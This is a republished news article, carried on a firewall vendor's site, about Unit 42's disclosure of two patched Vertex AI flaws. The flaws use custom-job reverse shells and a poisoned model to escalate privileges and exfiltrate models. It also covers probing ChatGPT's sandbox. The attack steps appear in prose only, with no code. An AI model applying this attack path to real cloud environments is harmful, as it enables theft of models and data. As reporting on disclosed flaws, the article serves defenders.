Phone : +91 95 8290 7788 | Email : sales@itmonteur.net

Register & Request Quote | Submit Support Ticket

Home » Cyber Security News » Vulnerabilities & Exploits » Researchers Warn of Privilege Escalation Risks in Google’s Vertex AI ML Platform

Researchers Warn of Privilege Escalation Risks in Google’s Vertex AI ML Platform

Researchers Warn of Privilege Escalation Risks in Google’s Vertex AI ML Platform

https://firewall.firm.in/wp-content/uploads/2024/11/ai.png

Nov 15, 2024Ravie LakshmananArtificial Intelligence / Vulnerability

Cybersecurity researchers have disclosed two security flaws in Google’s Vertex machine learning (ML) platform that, if successfully exploited, could allow malicious actors to escalate privileges and exfiltrate models from the cloud.

“By exploiting custom job permissions, we were able to escalate our privileges and gain unauthorized access to all data services in the project,” Palo Alto Networks Unit 42 researchers Ofir Balassiano and Ofir Shaty said in an analysis published earlier this week.

“Deploying a poisoned model in Vertex AI led to the exfiltration of all other fine-tuned models, posing a serious proprietary and sensitive data exfiltration attack risk.”

Vertex AI is Google’s ML platform for training and deploying custom ML models and artificial intelligence (AI) applications at scale. It was first introduced in May 2021.

Cybersecurity

Crucial to leveraging the privilege escalation flaw is a feature called Vertex AI Pipelines, which allows users to automate and monitor MLOps workflows to train and tune ML models using custom jobs.

Unit 42’s research found that by manipulating the custom job pipeline, it’s possible to escalate privileges to gain access to otherwise restricted resources. This is accomplished by creating a custom job that runs a specially-crafted image designed to launch a reverse shell, granting backdoor access to the environment.

The custom job, per the security vendor, runs in a tenant project with a service agent account that has extensive permissions to list all service accounts, manage storage buckets, and access BigQuery tables, which could then be abused to access internal Google Cloud repositories and download images.

The second vulnerability, on the other hand, involves deploying a poisoned model in a tenant project such that it creates a reverse shell when deployed to an endpoint, abusing the read-only permissions of the “custom-online-prediction” service account to enumerate Kubernetes clusters and fetch their credentials to run arbitrary kubectl commands.

“This step enabled us to move from the GCP realm into Kubernetes,” the researchers said. “This lateral movement was possible because permissions between GCP and GKE were linked through IAM Workload Identity Federation.”

The analysis further found that it’s possible to make use of this access to view the newly created image within the Kubernetes cluster and get the image digest – which uniquely identifies a container image – using them to extract the images outside of the container by using crictl with the authentication token associated with the “custom-online-prediction” service account.

On top of that, the malicious model could also be weaponized to view and export all large-language models (LLMs) and their fine-tuned adapters in a similar fashion.

This could have severe consequences when a developer unknowingly deploys a trojanized model uploaded to a public repository, thereby allowing the threat actor to exfiltrate all ML and fine-tuned LLMs. Following responsible disclosure, both the shortcomings have been addressed by Google.

“This research highlights how a single malicious model deployment could compromise an entire AI environment,” the researchers said. “An attacker could use even one unverified model deployed on a production system to exfiltrate sensitive data, leading to severe model exfiltration attacks.”

Organizations are recommended to implement strict controls on model deployments and audit permissions required to deploy a model in tenant projects.

Cybersecurity

The development comes as Mozilla’s 0Day Investigative Network (0Din) revealed that it’s possible to interact with OpenAI ChatGPT’s underlying sandbox environment (“/home/sandbox/.openai_internal/”) via prompts, granting the ability to upload and execute Python scripts, move files, and even download the LLM’s playbook.

That said, it’s worth noting that OpenAI considers such interactions as intentional or expected behavior, given that the code execution takes place within the confines of the sandbox and is unlikely to spill out.

“For anyone eager to explore OpenAI’s ChatGPT sandbox, it’s crucial to understand that most activities within this containerized environment are intended features rather than security gaps,” security researcher Marco Figueroa said.

“Extracting knowledge, uploading files, running bash commands or executing python code within the sandbox are all fair game, as long as they don’t cross the invisible lines of the container.”

Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.


Information Security - InfoSec - Cyber Security - Firewall Providers Company in India

 

 

 

 

 

 

 

 

 

 

 

 

What is Firewall? A Firewall is a network security device that monitors and filters incoming and outgoing network traffic based on an organization's previously established security policies. At its most basic, a firewall is essentially the barrier that sits between a private internal network and the public Internet.

 

Secure your network at the gateway against threats such as intrusions, Viruses, Spyware, Worms, Trojans, Adware, Keyloggers, Malicious Mobile Code (MMC), and other dangerous applications for total protection in a convenient, affordable subscription-based service. Modern threats like web-based malware attacks, targeted attacks, application-layer attacks, and more have had a significantly negative effect on the threat landscape. In fact, more than 80% of all new malware and intrusion attempts are exploiting weaknesses in applications, as opposed to weaknesses in networking components and services. Stateful firewalls with simple packet filtering capabilities were efficient blocking unwanted applications as most applications met the port-protocol expectations. Administrators could promptly prevent an unsafe application from being accessed by users by blocking the associated ports and protocols.

 

Firewall Firm is an IT Monteur Firewall Company provides Managed Firewall Support, Firewall providers , Firewall Security Service Provider, Network Security Services, Firewall Solutions India , New Delhi - India's capital territory , Mumbai - Bombay , Kolkata - Calcutta , Chennai - Madras , Bangaluru - Bangalore , Bhubaneswar, Ahmedabad, Hyderabad, Pune, Surat, Jaipur, Firewall Service Providers in India

Sales Number : +91 95 8290 7788 | Support Number : +91 94 8585 7788
Sales Email : sales@itmonteur.net | Support Email : support@itmonteur.net

Register & Request Quote | Submit Support Ticket